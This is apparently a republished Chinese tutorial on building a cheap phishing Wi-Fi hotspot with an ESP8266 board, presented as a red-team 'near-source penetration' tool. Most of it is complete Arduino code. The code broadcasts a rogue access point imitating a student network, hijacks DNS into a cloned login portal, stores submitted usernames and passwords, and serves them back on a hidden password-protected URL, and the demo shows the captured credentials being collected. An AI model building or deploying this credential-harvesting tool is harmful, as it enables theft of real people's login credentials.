在企業(yè)安全設(shè)備越來越多,邊境安全防護(hù)越做越好的情況下,釣魚攻擊已經(jīng)逐漸成為了紅藍(lán)對(duì)抗演練的主要方法。而隨著郵件服務(wù)器WAF等設(shè)備的更新以及企業(yè)人員安全意識(shí)的逐步提高,針" />

国产成人精品无码青草_亚洲国产美女精品久久久久∴_欧美人与鲁交大毛片免费_国产果冻豆传媒麻婆精东

15158846557 在線咨詢 在線咨詢
15158846557 在線咨詢
所在位置: 首頁 > 營銷資訊 > 網(wǎng)站運(yùn)營 > 近源滲透,超低成本打造自定義專屬釣魚WIFI

近源滲透,超低成本打造自定義專屬釣魚WIFI

時(shí)間:2023-07-22 01:33:01 | 來源:網(wǎng)站運(yùn)營

時(shí)間:2023-07-22 01:33:01 來源:網(wǎng)站運(yùn)營

近源滲透,超低成本打造自定義專屬釣魚WIFI:

在企業(yè)安全設(shè)備越來越多,邊境安全防護(hù)越做越好的情況下,釣魚攻擊已經(jīng)逐漸成為了紅藍(lán)對(duì)抗演練的主要方法。而隨著郵件服務(wù)器WAF等設(shè)備的更新以及企業(yè)人員安全意識(shí)的逐步提高,針對(duì)郵件釣魚攻擊也有了更多的防范措施。

在攻防演習(xí)、授權(quán)測(cè)試過程中,近源滲透與釣魚攻擊的組合拳能達(dá)到出其不意的效果,但行為有時(shí)也太過明顯--手持MBP在目標(biāo)附近轉(zhuǎn)悠,且有被直接抓獲的風(fēng)險(xiǎn)(活捉成就達(dá)成)。

于是筆者制作了一款釣魚WIFI,特點(diǎn)是小型且不易被發(fā)現(xiàn),信號(hào)范圍廣,其次是成本低,可將其安裝在目標(biāo)附近。

制作準(zhǔn)備

硬件

ESP8266(某寶10元左右)



電源模塊(可選)



軟件

Arduino 1.8.13及以上

軟件配置

Arduino - 首選項(xiàng) - 附加開發(fā)版管理網(wǎng)址,添加如下網(wǎng)址

http://arduino.esp8266.com/stable/package_esp8266com_index.jsonhttps://raw.githubusercontent.com/SpacehuhnTech/arduino/main/package_spacehuhn_index.json


2. Arduino - 工具 - 開發(fā)板 - 開發(fā)板管理器,輸入"esp8266",點(diǎn)擊查找,選擇"esp8266 by ESP8266 Community"安裝,下載時(shí)建議使用代理。





3. 下載ESP8266FS,將esp8266fs.jar放入Arduino根目錄下的tools文件夾,以MacOS為例,格式為 /Applications/Arduino.app/Contents/Java/tools/ESP8266FS/tool/esp8266fs.jar

制作釣魚網(wǎng)頁

此處以某認(rèn)證系統(tǒng)為例。

下載網(wǎng)頁




修改登錄接口為pass,用戶名密碼為user, pass。




刷寫ESP8266固件

Arduino - 文件 - 新建,新建項(xiàng)目。




  1. Arduino - 工具,配置開發(fā)板信息如下,需要注意端口的配置。




此處筆者直接貼出代碼,并對(duì)代碼做了詳細(xì)注解,希望讀者們認(rèn)真閱讀,重點(diǎn)代碼在于接受傳來的數(shù)據(jù)并存儲(chǔ)的過程,能夠舉一反三。

#include <ESP8266WiFi.h>#include <DNSServer.h>#include <ESP8266WebServer.h>#include <WiFiClient.h>#include <FS.h>// DNS默認(rèn)端口,無需修改const byte DNS_PORT = 53;// WIFI名稱const char *ssid = "HUBU-STUDENT-PRO";// AP的IP地址(即網(wǎng)關(guān)地址)IPAddress apIP(192, 168, 1, 1);// 查看存儲(chǔ)密碼的密碼String ppassword = "t123061";DNSServer dnsServer;ESP8266WebServer webServer(80);// 存儲(chǔ)賬號(hào)密碼String data = "";// 認(rèn)證頁面String responseHTML = "<html><head><meta http-equiv=/"refresh/" content=/"1;URL='http://192.168.1.1/index.html'/"></head></html>";// 登錄失敗頁面String responseHTML_error = "<html><head><meta http-equiv=/"refresh/" content=/"5;URL='http://192.168.1.1/index.html'/"><h3>沒有找到符合條件的策略,5秒后返回</h3></head></html>";String getContentType(String filename){ if(webServer.hasArg("download")) return "application/octet-stream"; else if(filename.endsWith(".htm")) return "text/html"; else if(filename.endsWith(".html")) return "text/html"; else if(filename.endsWith(".css")) return "text/css"; else if(filename.endsWith(".js")) return "application/javascript"; else if(filename.endsWith(".png")) return "image/png"; else if(filename.endsWith(".gif")) return "image/gif"; else if(filename.endsWith(".jpg")) return "image/jpeg"; else if(filename.endsWith(".ico")) return "image/x-icon"; else if(filename.endsWith(".xml")) return "text/xml"; else if(filename.endsWith(".pdf")) return "application/x-pdf"; else if(filename.endsWith(".zip")) return "application/x-zip"; else if(filename.endsWith(".gz")) return "application/x-gzip"; return "text/plain";}// 查看存儲(chǔ)的賬號(hào)和密碼void paw(){ if(webServer.arg("key")==ppassword){ webServer.send(200, "text/plain", data); }else{ webServer.send(200, "text/html", responseHTML); }}// 記錄從釣魚界面?zhèn)鬟^來的賬號(hào)和密碼void pass(){ if(webServer.arg("user") != "" && webServer.arg("pass") != ""){ data += "username:"; data += webServer.arg("user"); data += "----password:"; data += webServer.arg("pass"); data += "/r/n"; webServer.send(200, "text/html", responseHTML_error); }}void background() { File file = SPIFFS.open("/background.jpg", "r"); size_t sent = webServer.streamFile(file, "image/jpeg"); file.close(); return;} void bootstrap() { File file = SPIFFS.open("/bootstrap.css", "r"); size_t sent = webServer.streamFile(file, "text/css"); file.close(); return;} void logo_r() { File file = SPIFFS.open("/logo.png", "r"); size_t sent = webServer.streamFile(file, "image/png"); file.close(); return;} void favicon() { File file = SPIFFS.open("/favicon.ico", "r"); size_t sent = webServer.streamFile(file, "image/x-icon"); file.close(); return;} void main_r() { File file = SPIFFS.open("/main.css", "r"); size_t sent = webServer.streamFile(file, "text/css"); file.close(); return;} void middle_r() { File file = SPIFFS.open("/middle.png", "r"); size_t sent = webServer.streamFile(file, "image/png"); file.close(); return;} void uname_r() { File file = SPIFFS.open("/uname.png", "r"); size_t sent = webServer.streamFile(file, "image/png"); file.close(); return;} void upwd_r() { File file = SPIFFS.open("/upwd.png", "r"); size_t sent = webServer.streamFile(file, "image/png"); file.close(); return;}void index_r(){ File file = SPIFFS.open("/index.html", "r"); size_t sent = webServer.streamFile(file, "text/html"); file.close(); return;}// 首頁void handleRoot() { File file = SPIFFS.open("/index.html", "r"); size_t sent = webServer.streamFile(file, "text/html"); file.close(); return;}void setup() { // WIFI配置 Serial.begin(9600); SPIFFS.begin(); WiFi.mode(WIFI_AP); WiFi.softAPConfig(apIP, apIP, IPAddress(255, 255, 255, 0)); WiFi.softAP(ssid); // DNS配置 dnsServer.start(DNS_PORT, "*", apIP); // 配置404網(wǎng)頁為首頁 webServer.onNotFound([]() { webServer.send(200, "text/html", responseHTML); }); // 配置查看密碼網(wǎng)頁 webServer.on ("/key518", HTTP_GET, paw); webServer.on("/", handleRoot); // 配置登錄接口 webServer.on("/pass", HTTP_GET, pass); webServer.on("/background.jpg", background); webServer.on("/bootstrap.css", bootstrap); webServer.on("/logo.png", logo_r); webServer.on("favicon.ico", favicon); webServer.on("/main.css", main_r); webServer.on("/middle.png", middle_r); webServer.on("/uname.png", uname_r); webServer.on("/upwd.png", upwd_r); webServer.on("/index.html", index_r); webServer.begin();}void loop() { dnsServer.processNextRequest(); webServer.handleClient();}保存項(xiàng)目,會(huì)自動(dòng)生成一個(gè)文件夾存儲(chǔ)代碼文件,根據(jù)步驟3配置好開發(fā)板與端口后,點(diǎn)擊編譯上傳,等待上傳成功。




在項(xiàng)目目錄下新建data目錄,將前端文件放入,然后使用ESP8266FS工具上傳









到此制作已經(jīng)全部完成

成品演示

連接WiFi



連接WiFi后自動(dòng)彈出認(rèn)證界面,輸入用戶密碼test/test

點(diǎn)擊登錄后跳轉(zhuǎn)到預(yù)置的登錄失敗界面



訪問預(yù)置網(wǎng)址 http://192.168.1.1/key514?pass=t123061,收網(wǎng)




示例代碼

https://github.com/piaolin/ProximalPhishing(僅供學(xué)習(xí)參考使用)

聲明:?中所涉及的技術(shù)、思路和?具僅供以安全為?的的學(xué)習(xí)交流使?,任何?不得將其?于?法?途以及盈利等?的,且??承擔(dān)后果。

關(guān)鍵詞:定義,打造,滲透,成本

74
73
25
news

版權(quán)所有? 億企邦 1997-2025 保留一切法律許可權(quán)利。

為了最佳展示效果,本站不支持IE9及以下版本的瀏覽器,建議您使用谷歌Chrome瀏覽器。 點(diǎn)擊下載Chrome瀏覽器
關(guān)閉